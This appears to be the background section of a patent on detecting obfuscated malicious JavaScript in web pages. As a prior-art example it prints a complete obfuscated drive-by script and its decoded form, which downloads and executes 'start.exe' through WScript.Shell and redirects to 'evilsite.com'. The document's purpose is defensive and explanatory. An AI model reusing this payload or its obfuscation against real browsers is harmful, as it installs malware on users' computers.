Computers are often subject to attack in various forms. One form of attack is malware such as computer viruses, worms, etc. Another form of attack attempts to exploit a vulnerability in a computer such as denial of service, buffer overflow, etc. Intrusion detection systems (IDSs) are known to identify and block attacks such as malware and attempted exploits based on their signature, patterns of behavior and/or heuristics. (“Heuristics” are a series of conditions which, in combination, indicate a likely attack.) Another form of attack is obfuscated Java script code or Visual Basic script code embedded in an HTML or associated files and targeted at a web browser. Such obfuscated script code is not apparent or operational until executed by a script execution engine in a web browser. Such execution revises the original, non operational, obfuscated script code received from the HTML or associated file into operational (non obfuscated) script code. The known IDS may not detect the attack when obfuscated (because the known IDS scans the code from the HTML or associated files before the code is executed and converted into the revised, operational, non obfuscated, script code). Thus, the known IDS may pass the obfuscated script code to the web browser, and the web browser may convert the original program code into the revised, operational, script code for execution. Such execution may harm the client computer.
The following is a known example of an attack using obfuscated Java script code. As illustrated in FIG. 1 representing the Prior Art, a client computer 20 receives an HTML requested by a user of the client computer. The HTML (or associated files) includes obfuscated, non operational Java script code, such as the following:
<html><script><!--function f(b, a, c) { return a + b + c; } function g(b, a) { return a + b; } var s = new Array ( ″″,″start.exe″, ″http://evilsite.com ″, ″object″, ″classid″, f(″0C0″, g(f(g(″3-11D0-9″, ″56-65A″), ″id:BD96C5″, ″83A-0″), ″cls″), g(″9E36″, ″4FC2″)),g(f(″ft.XMLH″, ″oso″, ″TTP″), ″Micr″), f(″E″, ″G″, ″T″), f(g(″.Str″, ″odb″), ″Ad″, ″eam″),f(g(″.She″, ″ipt″), ″WScr″, ″11″), ″PROCESS″, ″TMP″, ″/[{circumflex over ( )}/]*$″, ″/″, ″\\″);eval(‘a = document.createElement(s[3]); a.setAttribute(s[4], s[5]); with(a.CreateObject(s[6],s[0])) { open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false); send( );if(status < 400) with(a.CreateObject(s[8], s[0])) { Type = 1; Open( ); Write(responseBody);with(a.CreateObject(s[9], s[0])) { c = Environment(s[10])(s[11]) + s[14] + s[1];SaveToFile(c, 2); Exec(c); } }}location.replace(s[2]);’);// --></script></html>A known IDS 14 scans the HTML for an attack. However, because of the obfuscation of the JavaScript code, the known IDS does not detect the attack, and invokes a known web browser 28 to process the HTML. The web browser 28 calls a known Document Object Module (“DOM”) 22 in the web browser. In response, a program function 26 within the DOM 22 “renders” static components of the HTML, i.e. converts non-executable portions of the document for display in the client computer. Another program function 27 in the DOM 22 identifies program code in the HTML or associated files and forwards the program code to a Java Script Engine (“JSE”) 24 for an iteration of execution. In the illustrated example, the first iteration of execution of the JavaScript code by the JSE yields the following revised JavaScript code:
a = document.createElement(″object″);a.setAttribute(″clsid″, ″XMLHTTP″);with(a.Createobject(″XMLHTTP″, ″″){open(″GET″, location.href.replace(new RegExp(″/[{circumflex over ( )}/]$″),″/start.exe″), false); send( );if(status < 400)with(a.CreateObject(″Adodb.Stream″, ″″)){Type = 1;Open( );Write(responseBody);with(a.CreateObject(″WScript.Shell″, ″″)){c = Environment(″PROCESS″)(″TMP\start.exe″);SaveToFile(c, 2);Exec(c);} }}location.replace(“http://evilsite.com”);In this example, the revised JavaScript code, when executed, will exploit a vulnerability on the client computer to download and run a malicious program file called “start.exe”. Next, the JSE loops back to its call address to execute the now operational malicious, revised JavaScript code. The execution of the operational, malicious, revised JavaScript code by the JSE 24 results in a successful attack on the client computer.
For some obfuscated Java Script Code, the operational form of the Java Script Code may not result until multiple iterations of processing and execution by the JSE, with each iteration of processing and execution by the JSE revising the Java Script Code one more time. Nevertheless, the operational malicious JavaScript code is ultimately generated and executed and harms the client computer.
An object of the present invention is to detect obfuscated malicious code in an HTML and associated files, or the like, and prevent its harmful execution.
Another object of the present invention is to detect obfuscated malicious script code in an HTML and associated files, or the like, and prevent its harmful execution.
Another object of the present invention is to detect obfuscated malicious code in an HTML and associated files, or the like, and prevent its harmful execution despite multiple iterations of processing and execution required to revise the malicious code into an operational form.